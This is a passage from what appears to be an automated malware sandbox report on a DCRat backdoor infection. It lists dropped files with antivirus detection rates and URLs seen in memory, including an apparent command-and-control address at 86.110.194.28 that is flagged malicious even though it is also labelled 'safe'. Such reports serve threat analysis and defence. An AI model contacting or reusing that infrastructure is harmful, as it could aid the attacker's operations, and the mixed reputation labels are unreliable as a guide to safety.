                          C:\Users\user\Desktop\GQyPcgoW.log25%ReversingLabs
                          C:\Users\user\Desktop\GUTYNdlI.log16%ReversingLabs
                          C:\Users\user\Desktop\HNZYygDR.log8%ReversingLabs
                          C:\Users\user\Desktop\HRugjdAD.log3%ReversingLabs
                          C:\Users\user\Desktop\IECYOtkU.log25%ReversingLabs
                          C:\Users\user\Desktop\IwSFjKJP.log17%ReversingLabs
                          C:\Users\user\Desktop\KCawqqLw.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\KUhOFMFy.log8%ReversingLabs
                          C:\Users\user\Desktop\MBrWacSF.log17%ReversingLabs
                          C:\Users\user\Desktop\MJbpFLtL.log21%ReversingLabs
                          C:\Users\user\Desktop\NKXFMJFr.log25%ReversingLabs
                          C:\Users\user\Desktop\OxfxrZpJ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\PHyNhJUm.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\PybNxWBp.log25%ReversingLabs
                          C:\Users\user\Desktop\QvCVTWQk.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\RfmVTnPw.log3%ReversingLabs
                          C:\Users\user\Desktop\TkxwTWEx.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\TuQMKFja.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\XXPuwSTl.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\XpVNKoNn.log29%ReversingLabs
                          C:\Users\user\Desktop\YqSdRlZU.log8%ReversingLabs
                          C:\Users\user\Desktop\aeWlDzVS.log9%ReversingLabs
                          C:\Users\user\Desktop\cPBBKMgL.log12%ReversingLabs
                          C:\Users\user\Desktop\cXlUovHQ.log21%ReversingLabs
                          C:\Users\user\Desktop\dBJtpdQc.log21%ReversingLabs
                          C:\Users\user\Desktop\ddkcuipI.log17%ReversingLabs
                          C:\Users\user\Desktop\eRokfvkG.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\fEwcKMUX.log12%ReversingLabs
                          C:\Users\user\Desktop\gBXkgMjS.log9%ReversingLabs
                          C:\Users\user\Desktop\gSeCuhdU.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\hbKlfOQH.log9%ReversingLabs
                          C:\Users\user\Desktop\kJRJIbpu.log21%ReversingLabs
                          C:\Users\user\Desktop\kOfTBNTO.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\kSAcnKQA.log25%ReversingLabs
                          C:\Users\user\Desktop\krNbnIjL.log9%ReversingLabs
                          C:\Users\user\Desktop\nzLkJbeH.log5%ReversingLabs
                          C:\Users\user\Desktop\oROSeukq.log29%ReversingLabs
                          C:\Users\user\Desktop\tahrXlpt.log25%ReversingLabs
                          C:\Users\user\Desktop\xAiiOWpY.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\yViIeRfn.log16%ReversingLabs
                          C:\Users\user\Desktop\yeGIODyj.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\zgCYVAKQ.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\zomqzklW.log17%ReversingLabs
                          C:\Windows\TAPI\ZWgKQlTqcrSB.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://wwoft.com/pki/cert0%Avira URL Cloudsafe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php0%Avira URL Cloudsafe
                          http://wicrosoft.com/PKI/docs/CPS/default.htm00%Avira URL Cloudsafe
                          http://86.110.194.280%Avira URL Cloudsafe
                          http://86.110.H0%Avira URL Cloudsafe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/0%Avira URL Cloudsafe
                          http://www.microsofm/pki/certs/MicRooCerAut_2010-06-23.crt00%Avira URL Cloudsafe
                          http://86.110.Hx;0%Avira URL Cloudsafe
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.phptrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabzSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                            		high
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFUJ59LdJnt9.24.drfalse
                              		high
                              http://www.fontbureau.com/designersGZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                  		high
                                  http://wwoft.com/pki/certpowershell.exe, 0000000A.00000002.2753998400.00000219B502E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/?ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers?ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.tiro.comZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://g.live.com/odclientsettings/ProdV2.C:edb.log.26.drfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                		high
                                                http://www.fontbureau.com/designersZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013337000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001337D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013ACF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013B15000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A43000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001320D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013181000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131C7000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000146AE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139FD000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130F5000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130AF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001313B000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013069000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013023000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A89000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FDD000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drfalse
                                                    		high
                                                    http://www.goodfont.co.krZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://wicrosoft.com/PKI/docs/CPS/default.htm0powershell.exe, 0000000A.00000002.2753998400.00000219B508A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://86.110.194.28ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003084000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sajatypeworks.comZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.typography.netDZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://g.live.com/odclientsettings/Prod.C:edb.log.26.drfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/cTheZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://g.live.com/odclientsettings/ProdV2edb.log.26.drfalse
                                                                  		high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013044000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FFE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A64000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AAA000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131A2000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001315C000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139D8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000014689000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FB8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AF0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131E8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001308A000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013116000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A1E000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013312000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013358000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchzSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                                      		high
                                                                      https://contoso.com/powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2601427075.0000015493297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2643181004.000002591A8C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.microsofm/pki/certs/MicRooCerAut_2010-06-23.crt0powershell.exe, 00000008.00000002.2776538231.000001549B62D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.galapagosdesign.com/DPleaseZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fonts.comZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.krZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.urwpp.deDPleaseZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.zhongyicts.com.cnZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehypersurrogateComponentdhcp.exe, 00000005.00000002.1889265427.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2023418258.000001FDA8A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67DA1000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sakkal.comZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000001A.00000003.2063367474.000001D5AB332000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drfalse
                                                                                          		high
                                                                                          http://86.110.HZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2601427075.0000015493297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2643181004.000002591A8C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.comZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icozSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                                                                  		high
                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.2023418258.000001FDA8C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590AA78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                                                                            		high
                                                                                                            http://crl.ver)svchost.exe, 0000001A.00000002.2929703953.000001D5AB400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.microsoft.powershell.exe, 0000000D.00000002.2794838797.000001BD7FDA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013337000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001337D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013ACF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013B15000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A43000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001320D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013181000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131C7000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000146AE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139FD000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130F5000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130AF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001313B000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013069000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013023000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A89000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FDD000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drfalse
                                                                                                                  		high
                                                                                                                  https://www.ecosia.org/newtab/zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                                                                                    		high
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brUJ59LdJnt9.24.drfalse
                                                                                                                      		high
                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.carterandcone.comlZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://ac.ecosia.org/autocomplete?q=zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.founder.com.cn/cnZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003084000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000001A.00000003.2063367474.000001D5AB332000.00000004.00000800.00020000.00000000.sdmp, edb.log.26.drfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2023418258.000001FDA8C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590AA78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.jiyu-kobo.co.jp/ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
